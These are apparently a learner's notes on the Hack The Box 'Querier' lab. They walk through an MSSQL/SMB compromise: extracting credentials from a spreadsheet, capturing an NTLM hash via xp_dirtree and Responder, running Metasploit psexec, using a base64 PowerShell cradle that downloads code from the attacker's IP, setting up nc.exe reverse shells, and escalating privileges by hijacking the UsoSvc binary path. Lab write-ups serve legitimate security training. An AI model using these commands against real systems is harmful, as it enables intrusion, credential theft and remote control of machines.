SQL server and SMB
Start responder to try to catch the NTLM Hash
Check SMB > get XLSM file
open it with visual basic and get a password and the author of file:
luis:PcwTWTHRwryjc$c6
luis didn’t work. What did he do?
He used binwalk:
binwalk "Currency Volume Report.xlsm"
What else can it do?
binwalk --help
We wanna extract the files inside:
binwalk -e "Currency Volume Report.xlsm"
cat the bin:
He ended up getting the same thing. What I missed:
“Uid” was the username, not luis.
It didn’t let me login. How he did it: Connect to the mssql using mssqlclient.py
mssqlclient.py QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
We want to try to get a shell. Since it’s disabled, we can force pull hashes. How?
Make sure responder in running and:
exec xp_dirtree '\\10.10.14.13\share\',1,1
Responder will pull a hash
Cracked password:
corporate568
metasploit?
search psexec
use 4 #(exploit smb psexec) #number changed? windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 10.10.10.125
set smbdomain QUERIER
set smbuser mssql-svc
set smbpass corporate568
options #to review everything
show targets
psexec.py:
psexec.py QUERIER/mssql-svc:'corporate568'@10.10.10.125
No admin access.
Redo the steps with the new credentials!
mssqlclient.py QUERIER/mssql-svc:'corporate568'@10.10.10.125 -windows-auth
we can get shell now
we got systeminfo. Run it thru WES:
CD there:
cd /opt/
./windows-exploit-suggester.py --database 2024-04-09-mssb.xls --systeminfo /home/kali/Desktop/HackTheBox/Querier/systeminfo.txt -o Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763
nothing. Send over PowerUp?
certutil -urlcache -f http://10.10.14.13/PowerUp.ps1 PowerUp.ps1
We have impersonate priv:
xp_cmdshell 'powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB2AEgAWgBhAGMAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAdgBIAFoAYQBjAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAdgBIAFoAYQBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAzADoAOAAwADgAMAAvAGUAQwBGADQAOQBiAE0AeQBLAC8AWgA1AGkAbgBGAHAARgBmAHIAdgAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAzADoAOAAwADgAMAAvAGUAQwBGADQAOQBiAE0AeQBLACcAKQApADsA'
- needs to be without quotes
- too long
Try metasploit ith the one that worked?
xp_cmdshell powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB2AEgAWgBhAGMAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAdgBIAFoAYQBjAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAdgBIAFoAYQBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAzADoAOAAwADgAMAAvAGUAQwBGADQAOQBiAE0AeQBLAC8AWgA1AGkAbgBGAHAARgBmAHIAdgAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAzADoAOAAwADgAMAAvAGUAQwBGADQAOQBiAE0AeQBLACcAKQApADsA
woooo it worked!!
get meterpreter session 1:
sessions 1
Get info:
getuid
sysinfo
getprivs
Run meterpreter suggester:
run post/multi/recon/local_exploit_suggester
Vulnerable to a familiar one:
[+] 10.10.10.125 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
Use reflection:
background
#didn't work
Check tokens that we can impersonate:
load incognito
list_tokens -u
None
Test the rest of the exploits metasploit suggester gave:
use exploit/windows/local/cve_2021_40449
^this worked
if non worked, I could’ve gone the manual route with nc.exe + msfvenom shell
session 2
getuid
shell
Get flags
$$$$$$$$$$$$$$$WHAT I DID WRONG$$$$$$$$$$$$$$$$$$$
I didn’t notice Uid (username) and tried the wrong username
when thing didn’t work out, I didn’t go back and try new credentials for direct access (mssqlclient)
I needed to fix syntax (quotes/no quotes) in the xp_cmdshell
Forgot to just try getsystem when I got a meterpreter shell (it would have worked)
####################WHAT HE DID##################
try my own shell:
send over nc.exe:
How to copy nc to folder:
cp /home/kali/nc.exe /home/kali/transfer
xp_cmdshell powershell Invoke-WebRequest "http://10.10.14.13/nc.exe" -OutFile "C:\Reports\nc.exe"
What he did:
He made his own shell
xp_cmdshell 'powershell Invoke-WebRequest "http://10.10.14.13/nc.exe" -OutFile "C:\Reports\nc.exe"'
xp_cmdshell powershell -c Invoke-WebRequest "http://10.10.14.13/nc.exe" -OutFile "C:\Reports\nc.exe"
connect back:
Open listener:
nc -nvlp 4444
connect:
xp_cmdshell C:\Reports\nc.exe 10.10.14.13 4444 -e cmd.exe
Host PowerUp or Sherlock with the auto run added to the end of them and run the echo command:
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:80/Sherlock.ps1') | powershell -noprofile -
It found UsoSvc
what is it?
sc qc UsoSvc
You can edit the binary path
Method 1:
Using the abuse method from PowerUp:
Invoke-ServiceUserAdd
Method 2:
editing the binary:
sc config UsoSvc binpath= "C:\Reports\nc.exe 10.10.14.13 5555 -e cmd.exe"
Needs a different port than the one we’re currently connected on
Double check that it got edited:
sc qc UsoSvc
open nc listener:
nc -nvlp 5555
stop and start:
sc stop UsoSvc & sc start UsoSvc
Note: This also had GPP pass